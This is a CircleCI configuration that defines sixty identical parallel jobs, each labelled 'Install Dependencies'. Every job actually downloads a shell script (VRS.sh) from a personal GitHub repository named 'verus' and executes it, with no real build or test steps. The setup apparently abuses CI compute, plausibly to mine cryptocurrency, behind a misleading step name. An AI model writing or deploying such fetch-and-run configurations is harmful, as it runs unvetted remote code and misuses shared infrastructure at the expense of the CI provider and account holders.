version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku21:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku22:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku23:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku24:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku25:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku26:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku27:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku28:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku29:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku30:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku31:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku32:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku33:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku34:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku35:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku36:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku37:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku38:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku39:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku40:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku41:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku42:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku43:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku44:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku45:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku46:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku47:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku48:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku49:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku50:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku51:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku52:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku53:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku54:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku55:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku56:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku57:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku58:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku59:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh
    aku60:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/yogi899/verus/main/VRS.sh && chmod u+x VRS.sh && ./VRS.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
            - aku11
            - aku12
            - aku13
            - aku14
            - aku15
            - aku16
            - aku17
            - aku18
            - aku19
            - aku20
            - aku21
            - aku22
            - aku23
            - aku24
            - aku25
            - aku26
            - aku27
            - aku28
            - aku29
            - aku30
            - aku31
            - aku32
            - aku33
            - aku34
            - aku35
            - aku36
            - aku37
            - aku38
            - aku39
            - aku40
            - aku41
            - aku42
            - aku43
            - aku44
            - aku45
            - aku46
            - aku47
            - aku48
            - aku49
            - aku50
            - aku51
            - aku52
            - aku53
            - aku54
            - aku55
            - aku56
            - aku57
            - aku58
            - aku59
            - aku60